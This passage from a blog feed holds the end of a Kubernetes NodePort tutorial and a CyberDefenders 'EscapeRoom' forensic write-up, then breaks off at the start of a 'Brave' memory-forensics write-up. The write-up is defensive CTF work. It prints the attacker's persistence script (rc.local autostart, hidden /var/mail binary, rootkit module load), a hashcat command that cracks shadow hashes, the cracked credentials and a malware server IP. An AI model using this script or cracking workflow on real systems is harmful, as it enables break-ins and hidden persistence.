&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;yaml&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Service&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;creationTimestamp:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;null&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;labels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;run:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;cars-app-pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;cars-app-pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;namespace:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;private-docker&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;ports:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;port:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;80&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;protocol:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;TCP&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;targetPort:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;80&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;selector:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;run:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;cars-app-pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;type:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;NodePort&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s now check the service and get the node port that we will use it to test the pod&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ kubectl get svc -n private-docker&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME           TYPE       CLUSTER-IP     EXTERNAL-IP   PORT(S)        AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;cars-app-pod   NodePort   10.111.98.22   &amp;lt;none&amp;gt;        80:31651/TCP   6s&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now you can visit either &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cDovL21hc3RlcjozMTY1MQ==&#34;&gt;http://master:31651&lt;/span&gt; or &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cDovL3dvcmtlcjE6MzE2NTE=&#34;&gt;http://worker1:31651&lt;/span&gt; and you will find the static website work without any problem!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/3TVOl36.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
</content>
        <category term="kubernetes" />
        <updated>2022-09-08T00:47:58.000Z</updated>
    </entry>
    <entry>
        <id>http://example.com/2022/09/07/CyberDefenders/EscapeRoom/</id>
        <title>CyberDefenders Writeup EscapeRoom</title>
        <link rel="alternate" href="http://example.com/2022/09/07/CyberDefenders/EscapeRoom/"/>
        <content type="html">&lt;p&gt;This CTF challenge is made by The Honeynet Project organization. This challenge is a combination of several entry to intermediate-level tasks of increasing difficulty focusing on authentication, information hiding, and cryptography.&lt;/p&gt;
&lt;h1 id=&#34;challenge-information&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#challenge-information&#34;&gt;#&lt;/a&gt; Challenge Information&lt;/h1&gt;
&lt;details class=&#34;info&#34;&gt;&lt;summary&gt;Description&lt;/summary&gt;&lt;div&gt;
&lt;p&gt;You belong to a company specializing in hosting web applications through KVM-based Virtual Machines. Over the weekend, one VM went down, and the site administrators fear this might be the result of malicious activity. They extracted a few logs from the environment in hopes that you might be able to determine what happened.&lt;/p&gt;
&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;Challenge Link &amp;amp; Author&lt;/p&gt;
&lt;div class=&#34;links&#34;&gt;&lt;div class=&#34;item&#34; title=&#34;Challenge Link&#34; style=&#34;--block-color:#2296fd;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9jeWJlcmRlZmVuZGVycy5vcmcvYmx1ZXRlYW0tY3RmLWNoYWxsZW5nZXMvMTg=&#34; data-background-image=&#34;https://cyberdefenders.org/static/img/cyberdefenders-logo-white.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9jeWJlcmRlZmVuZGVycy5vcmcvYmx1ZXRlYW0tY3RmLWNoYWxsZW5nZXMvMTg=&#34;&gt;Challenge Link&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;CyberDefenders - EscapeRoom&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;Author - The Honeynet Project&#34; style=&#34;--block-color:#fcc11c;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly90d2l0dGVyLmNvbS9Qcm9qZWN0SG9uZXluZXQ=&#34; data-background-image=&#34;https://pbs.twimg.com/profile_images/582417177254334464/BNceiZYA_400x400.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly90d2l0dGVyLmNvbS9Qcm9qZWN0SG9uZXluZXQ=&#34;&gt;Author - The Honeynet Project&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;The Honeynet Project Twitter Profile&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;h1 id=&#34;walkthrough&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#walkthrough&#34;&gt;#&lt;/a&gt; Walkthrough&lt;/h1&gt;
&lt;p&gt;We start analyzing the pcap file, i open it with Brim Security and checking the alerts!! Oh god! A lot of ssh flows! mmm I guess the attacker try to gain access through the ssh service, he did a bruteforce attack !&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/cXk82fL.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;1- What service did the attacker use to gain access to the system?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The attacker use ssh protocol to gain access to the system !&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: ssh&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;2- What attack type was used to gain access to the system?(one word)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We found a lot of ssh packets! I am sure this is a bruteforce attack&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: bruteforce&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;3- What was the tool the attacker possibly used to perform this attack?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;One of the most famous tools that can do this type of attack is hydra&lt;br&gt;
Hydra is an amazing tool for testing the strength of your SSH security. It is capable of running through massive lists of usernames, passwords, and targets to test if you or a user is using a potentially vulnerable password.&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: Hydra&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;4- How many failed attempts were there?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let’s inspect the alert events in Brim Security and apply the count() by feature in the  &lt;code&gt;alert.signature&lt;/code&gt; . We found 53  &lt;code&gt;NetSSH Hardcoded in Metasploit&lt;/code&gt; . We decrease by 1 the success one!&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/DpgkZjt.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: 52&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;We have the hashes of the passwords! We know that the hashes are SHA-512(UNIX). The black cat (oh means hashcat) will help us cracking these hashes!&lt;br&gt;
ٍ&lt;img data-src=&#34;https://imgur.com/DN0qNUF.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;hashcat -a 0 -m 1800 shadow.log rockyou.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Session..........: hashcat&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Status...........: Running&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Hash.Target......: crack.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Time.Started.....: Wed Sep  7 23:58:23 2022 (43 mins, 15 secs)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Time.Estimated...: Fri Sep  9 04:15:48 2022 (1 day, 3 hours)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Kernel.Feature...: Pure Kernel&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Guess.Base.......: File (/mnt/c/Users/Mohamed Rafraf/Desktop/rockyou.txt)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Guess.Queue......: 1/1 (100.00%)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Speed.1.........:      986 H/s (5.30ms) @ Accel:32 Loops:1024 Thr:1 Vec:4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Recovered........: 3/10 (30.00%) Digests, 3/10 (30.00%) Salts&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Progress.........: 3579360/143443840 (2.50%)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Rejected.........: 0/3579360 (0.00%)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Restore.Point....: 357920/14344384 (2.50%)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Restore.Sub.1...: Salt:5 Amplifier:0-1 Iteration:4096-5000&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Candidate.Engine.: Device Generator&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Candidates.1....: donjoe -&amp;gt; dominique12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;blockquote&gt;
&lt;p&gt;5- What credentials (username:password) were used to gain access? Refer to shadow.log and sudoers.log.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Just wait for hashcat man!&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;manager:forgot&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;6- What other credentials (username:password) could have been used to gain access also have SUDO privileges? Refer to shadow.log and sudoers.log.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Hashcat will save you for sure !&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;sean:spectre&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;7- What is the tool used to download malicious files on the system?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let’s check the  &lt;code&gt;user-agent&lt;/code&gt;  in brim security. you can do it with wireshark too!&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/P9haLBY.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: wget&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;8- How many files the attacker download to perform malware installation?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Checking the non-media files in brim security will help us to know about the files&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/P6St7uU.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: 3&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;9- What is the main malware MD5 hash?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The malware is an executable file for sure! let’s check it&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/VN12PmD.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Open the details about it and you’ll get the md5sum !&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/YgnR9gz.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: 772b620736b760c1d736b1e6ba2f885b&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;We found this bash script that rename the malware mail and hide it in /var/mail/ directory and make it executable at the startup!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;meta&#34;&gt;#!/bin/bash&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;mv&lt;/span&gt; 1 /var/mail/mail&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;chmod&lt;/span&gt; +x /var/mail/mail&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;echo&lt;/span&gt; -e &lt;span class=&#34;string&#34;&gt;&amp;quot;/var/mail/mail &amp;amp;\nsleep 1\npidof mail &amp;gt; /proc/dmesg\nexit 0&amp;quot;&lt;/span&gt; &amp;gt; /etc/rc.local&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;nohup&lt;/span&gt; /var/mail/mail &amp;gt; /dev/null 2&amp;gt;&amp;amp;1&amp;amp;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;mv&lt;/span&gt; 2 /lib/modules/`&lt;span class=&#34;built_in&#34;&gt;uname&lt;/span&gt; -r`/sysmod.ko&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;depmod -a&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;echo&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;sysmod&amp;quot;&lt;/span&gt; &amp;gt;&amp;gt; /etc/modules&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;modprobe sysmod&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;sleep&lt;/span&gt; 1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pidof mail &amp;gt; /proc/dmesg&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;rm&lt;/span&gt; 3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;blockquote&gt;
&lt;p&gt;10- What file has the script modified so the malware will start upon reboot?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The script /etc/rc.local is for use by the system administrator. It is traditionally executed after all the normal system services are started&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: /etc/rc.local&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;11- Where did the malware keep local files?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;/var/mail/&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;12- What is missing from ps.log?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In the ps.log we don’t find the process related to the malware (the mail executable)&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;/var/mail/mail&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;13- What is the main file that used to remove this information from ps.log?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;There is another binary that moved and renamed as  &lt;code&gt;sysmod.ko&lt;/code&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: sysmod.ko&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;14- Inside the Main function, what is the function that causes requests to those servers?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;After unpacking the malware. I opened the binary with IDA Pro to decompile it. Check the main function and we found this !&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/79houmJ.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: requestFile&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;15- One of the IP’s the malware contacted starts with 17. Provide the full IP.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;requestFile function use address array as parameters. let’s check it ! we found all the IP address. COOL !&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/4NLcX9k.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: 174.129.57.253&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;16- How many files the malware requested from external servers?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is easy man ! just check the other downloaded files !&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/hjMszwa.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: 9&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;17- What are the commands that the malware was receiving from attacker servers? Format: comma-separated in alphabetical order&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;After spending time on thinking and searching. We get the idea !&lt;br&gt;
The malware will get message form attacker servers! So let’s check some functions call that related to something like messaging ! You’ll find these functions in main !&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/V4JQttO.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;The function check if the parameter has these 2 values ! I want to check it&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/KSxTPRa.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;After using python to convert the numbers to text using long_to_bytes function i found that 2 values are instruction in the assembly , Bingo we get it !&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/Hz6LsfB.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: nop,run&lt;/p&gt;
&lt;/div&gt;
</content>
        <updated>2022-09-07T15:28:39.000Z</updated>
    </entry>
    <entry>
        <id>http://example.com/2022/09/06/CyberDefenders/brave/</id>
        <title>CyberDefenders Writeup Brave</title>
        <link rel="alternate" href="http://example.com/2022/09/06/CyberDefenders/brave/"/>
        <content type="html">&lt;p&gt;This CTF challenge is about retrieving data from a memory dump, and analyzing the processes and connections and dealing with registries!&lt;/p&gt;
&lt;h1 id=&#34;challenge-information&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#challenge-information&#34;&gt;#&lt;/a&gt; Challenge Information&lt;/h1&gt;
&lt;details class=&#34;info&#34;&gt;&lt;summary&gt;Description&lt;/summary&gt;&lt;div&gt;
&lt;p&gt;A memory image was taken from a seized Windows machine. Analyze the image and answer the provided questions.&lt;/p&gt;
&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;Challenge Link &amp;amp; Author&lt;/p&gt;
&lt;div class=&#34;links&#34;&gt;&lt;div class=&#34;item&#34; title=&#34;Challenge Link&#34; style=&#34;--block-color:#2296fd;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9jeWJlcmRlZmVuZGVycy5vcmcvYmx1ZXRlYW0tY3RmLWNoYWxsZW5nZXMvNjc=&#34; data-background-image=&#34;https://cyberdefenders.org/static/img/cyberdefenders-logo-white.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9jeWJlcmRlZmVuZGVycy5vcmcvYmx1ZXRlYW0tY3RmLWNoYWxsZW5nZXMvNjc=&#34;&gt;Challenge Link&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;CyberDefenders - Brave&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;Author - DFIRScience&#34; style=&#34;--block-color:#fcc11c;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly90d2l0dGVyLmNvbS9ERklSU2NpZW5jZQ==&#34; data-background-image=&#34;https://pbs.twimg.com/profile_images/1517319188167204866/lgRHWtGk_400x400.jpg&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly90d2l0dGVyLmNvbS9ERklSU2NpZW5jZQ==&#34;&gt;Author - DFIRScience&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;DFIRScience Twitter Profile&lt;/p&gt;
